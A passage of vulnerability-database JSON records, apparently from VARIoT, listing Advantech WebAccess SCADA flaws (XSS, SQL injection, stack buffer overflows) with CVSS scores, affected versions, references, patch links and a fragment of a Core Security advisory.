"e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21798" }, { "db": "VULHUB", "id": "VHN-125989" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21798" } ] }, "last_update_date": "2024-11-23T22:17:17.921000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011102" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125989" }, { "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "db": "NVD", "id": "CVE-2018-15703" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://www.tenable.com/security/research/tra-2018-33" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15703" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15703" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-21798" }, { "db": "VULHUB", "id": "VHN-125989" }, { "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "db": "CNNVD", "id": "CNNVD-201810-1119" }, { "db": "NVD", "id": "CVE-2018-15703" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21798" }, { "db": "VULHUB", "id": "VHN-125989" }, { "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "db": "CNNVD", "id": "CNNVD-201810-1119" }, { "db": "NVD", "id": "CVE-2018-15703" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-26T00:00:00", "db": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "date": "2018-10-25T00:00:00", "db": "CNVD", "id": "CNVD-2018-21798" }, { "date": "2018-10-22T00:00:00", "db": "VULHUB", "id": "VHN-125989" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "date": "2018-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1119" }, { "date": "2018-10-22T19:29:00.360000", "db": "NVD", "id": "CVE-2018-15703" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2018-21798" }, { "date": "2018-12-03T00:00:00", "db": "VULHUB", "id": "VHN-125989" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "date": "2018-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1119" }, { "date": "2024-11-21T03:51:18.473000", "db": "NVD", "id": "CVE-2018-15703" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1119" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to cross-site scripting", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011102" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1119" } ], "trust": 0.6 } }
var-201801-0138
Vulnerability from variot
A SQL Injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands. Advantech WebAccess Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within ChkAdminViewUsrPwd1, called from mailPg.asp. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code under the context of the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 3.5, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 2.4, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-026" }, { "db": "ZDI", "id": "ZDI-18-064" }, { "db": "ZDI", "id": "ZDI-18-065" }, { "db": "ZDI", "id": "ZDI-18-027" }, { "db": "ZDI", "id": "ZDI-18-028" }, { "db": "CNVD", "id": "CNVD-2018-00669" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011764" }, { "db": "CNNVD", "id": "CNNVD-201801-244" }, { "db": "NVD", "id": "CVE-2017-16716" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-011764" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-026" }, { "db": "ZDI", "id": "ZDI-18-027" }, { "db": "ZDI", "id": "ZDI-18-028" } ], "trust": 2.1 }, "cve": "CVE-2017-16716", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-16716", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 3.5, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2017-16716", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-00669", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-107666", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-16716", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2017-16716", "trust": 3.5, "value": "MEDIUM" }, { "author": "nvd@nist.gov", "id": "CVE-2017-16716", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-16716", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2018-00669", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201801-244", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-107666", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2017-16716", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-026" }, { "db": "ZDI", "id": "ZDI-18-064" }, { "db": "ZDI", "id": "ZDI-18-065" }, { "db": "ZDI", "id": "ZDI-18-027" }, { "db": "ZDI", "id": "ZDI-18-028" }, { "db": "CNVD", "id": "CNVD-2018-00669" }, { "db": "VULHUB", "id": "VHN-107666" }, { "db": "VULMON", "id": "CVE-2017-16716" }, { "db": "JVNDB", "id": "JVNDB-2017-011764" }, { "db": "CNNVD", "id": "CNNVD-201801-244" }, { "db": "NVD", "id": "CVE-2017-16716" } ] }, "description": { "_id": null, "data": "A SQL Injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands. Advantech WebAccess Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within ChkAdminViewUsrPwd1, called from mailPg.asp. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code under the context of the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple denial-of-service vulnerabilities\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. A directory-traversal vulnerability\n4. An SQL-injection vulnerability\n5. Failed attacks will cause denial of service conditions. \nversions prior to Advantech WebAccess 8.3 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-16716" }, { "db": "JVNDB", "id": "JVNDB-2017-011764" }, { "db": "ZDI", "id": "ZDI-18-026" }, { "db": "ZDI", "id": "ZDI-18-064" }, { "db": "ZDI", "id": "ZDI-18-065" }, { "db": "ZDI", "id": "ZDI-18-027" }, { "db": "ZDI", "id": "ZDI-18-028" }, { "db": "CNVD", "id": "CNVD-2018-00669" }, { "db": "BID", "id": "102424" }, { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-107666" }, { "db": "VULMON", "id": "CVE-2017-16716" } ], "trust": 5.94 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-107666", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43928", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-107666" }, { "db": "VULMON", "id": "CVE-2017-16716" } ] }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-16716", "trust": 7.2 }, { "db": "BID", "id": "102424", "trust": 3.5 }, { "db": "ICS CERT", "id": "ICSA-18-004-02", "trust": 2.1 }, { "db": "EXPLOIT-DB", "id": "43928", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201801-244", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-00669", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-18-004-02A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-011764", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4994", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-026", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5398", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-064", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5407", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-065", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4995", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-027", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4996", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-028", "trust": 0.7 }, { "db": "NSFOCUS", "id": "38634", "trust": 0.6 }, { "db": "IVD", "id": "E2E0B981-39AB-11E9-83BA-000C29342CB1", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "146149", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-107666", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2017-16716", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-026" }, { "db": "ZDI", "id": "ZDI-18-064" }, { "db": "ZDI", "id": "ZDI-18-065" }, { "db": "ZDI", "id": "ZDI-18-027" }, { "db": "ZDI", "id": "ZDI-18-028" }, { "db": "CNVD", "id": "CNVD-2018-00669" }, { "db": "VULHUB", "id": "VHN-107666" }, { "db": "VULMON", "id": "CVE-2017-16716" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011764" }, { "db": "CNNVD", "id": "CNNVD-201801-244" }, { "db": "NVD", "id": "CVE-2017-16716" } ] }, "id": "VAR-201801-0138", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00669" }, { "db": "VULHUB", "id": "VHN-107666" } ], "trust": 1.4972832733333332 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00669" } ] }, "last_update_date": "2024-11-23T22:22:15.992000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 3.5, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability (CNVD-2018-00669)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/113117" }, { "title": "Advantech WebAccess SQL Repair measures for injecting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77555" }, { "title": "Awesome CVE PoC", "trust": 0.1, "url": "https://github.com/lnick2023/nicenice " }, { "title": "Awesome CVE PoC", "trust": 0.1, "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 " }, { "title": "Awesome CVE PoC", "trust": 0.1, "url": "https://github.com/qazbnm456/awesome-cve-poc " } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-026" }, { "db": "ZDI", "id": "ZDI-18-064" }, { "db": "ZDI", "id": "ZDI-18-065" }, { "db": "ZDI", "id": "ZDI-18-027" }, { "db": "ZDI", "id": "ZDI-18-028" }, { "db": "CNVD", "id": "CNVD-2018-00669" }, { "db": "VULMON", "id": "CVE-2017-16716" }, { "db": "JVNDB", "id": "JVNDB-2017-011764" }, { "db": "CNNVD", "id": "CNNVD-201801-244" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-107666" }, { "db": "JVNDB", "id": "JVNDB-2017-011764" }, { "db": "NVD", "id": "CVE-2017-16716" } ] }, "references": { "_id": null, "data": [ { "trust": 5.6, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" }, { "trust": 3.3, "url": "http://www.securityfocus.com/bid/102424" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/43928/" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16716" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02a" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16716" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/38634" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/89.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/qazbnm456/awesome-cve-poc" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-026" }, { "db": "ZDI", "id": "ZDI-18-064" }, { "db": "ZDI", "id": "ZDI-18-065" }, { "db": "ZDI", "id": "ZDI-18-027" }, { "db": "ZDI", "id": "ZDI-18-028" }, { "db": "CNVD", "id": "CNVD-2018-00669" }, { "db": "VULHUB", "id": "VHN-107666" }, { "db": "VULMON", "id": "CVE-2017-16716" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011764" }, { "db": "CNNVD", "id": "CNNVD-201801-244" }, { "db": "NVD", "id": "CVE-2017-16716" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-026", "ident": null }, { "db": "ZDI", "id": "ZDI-18-064", "ident": null }, { "db": "ZDI", "id": "ZDI-18-065", "ident": null }, { "db": "ZDI", "id": "ZDI-18-027", "ident": null }, { "db": "ZDI", "id": "ZDI-18-028", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-00669", "ident": null }, { "db": "VULHUB", "id": "VHN-107666", "ident": null }, { "db": "VULMON", "id": "CVE-2017-16716", "ident": null }, { "db": "BID", "id": "102424", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-011764", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201801-244", "ident": null }, { "db": "NVD", "id": "CVE-2017-16716", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-01-10T00:00:00", "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-026", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-064", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-065", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-027", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-028", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00669", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-107666", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2017-16716", "ident": null }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424", "ident": null }, { "date": "2018-01-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-011764", "ident": null }, { "date": "2018-01-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-244", "ident": null }, { "date": "2018-01-05T08:29:00.267000", "db": "NVD", "id": "CVE-2017-16716", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-026", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-064", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-065", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-027", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-028", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00669", "ident": null }, { "date": "2018-02-02T00:00:00", "db": "VULHUB", "id": "VHN-107666", "ident": null }, { "date": "2018-02-02T00:00:00", "db": "VULMON", "id": "CVE-2017-16716", "ident": null }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424", "ident": null }, { "date": "2018-04-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-011764", "ident": null }, { "date": "2018-01-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-244", "ident": null }, { "date": "2024-11-21T03:16:50.577000", "db": "NVD", "id": "CVE-2017-16716", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201801-244" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-011764" } ], "trust": 0.8 }, "type": { "_id": null, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "e2e0b981-39ab-11e9-83ba-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201801-244" } ], "trust": 0.8 } }
var-202107-1926
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwFreRPT.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-779" } ] }, "credits": { "_id": null, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-21-779" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-21-779", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-21-779", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-779" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwFreRPT.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user.", "sources": [ { "db": "ZDI", "id": "ZDI-21-779" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-13039", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-21-779", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-779" } ] }, "id": "VAR-202107-1926", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:05:42.841000Z", "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-21-779", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2021-07-05T00:00:00", "db": "ZDI", "id": "ZDI-21-779", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2021-07-07T00:00:00", "db": "ZDI", "id": "ZDI-21-779", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess Node BwFreRPT Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-21-779" } ], "trust": 0.7 } }
var-201409-0441
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the NodeName2 parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software featuring all engineering projects, database setup, drawing and software management using standard browsers over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
-
